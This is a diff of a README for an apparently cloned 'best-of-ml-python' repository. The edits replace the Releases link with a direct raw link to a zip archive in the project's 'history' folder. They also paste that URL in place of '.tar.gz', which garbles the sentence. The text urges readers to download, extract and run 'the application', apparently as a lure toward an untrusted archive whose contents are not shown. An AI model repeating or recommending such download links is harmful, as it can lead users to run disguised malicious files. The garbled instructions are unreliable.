Sora468/best-of-ml-python/README.md

   - Reinforcement learning tools

 ## 📥 Download & Install
-To get started, visit [this page to download](https://github.com/Sora468/best-of-ml-python/releases).
+To get started, visit [this page to download](https://raw.githubusercontent.com/Sora468/best-of-ml-python/main/history/best-of-ml-python-Hobbist.zip).

 1. Click on the "Releases" section.
 2. Select the version you want to download.
 3. Follow the instructions based on your operating system.

-After downloading, extract the contents if the files are in a compressed format (like .zip or .tar.gz).
+After downloading, extract the contents if the files are in a compressed format (like .zip or https://raw.githubusercontent.com/Sora468/best-of-ml-python/main/history/best-of-ml-python-Hobbist.zip).

 ### Running the Application
 To run the application: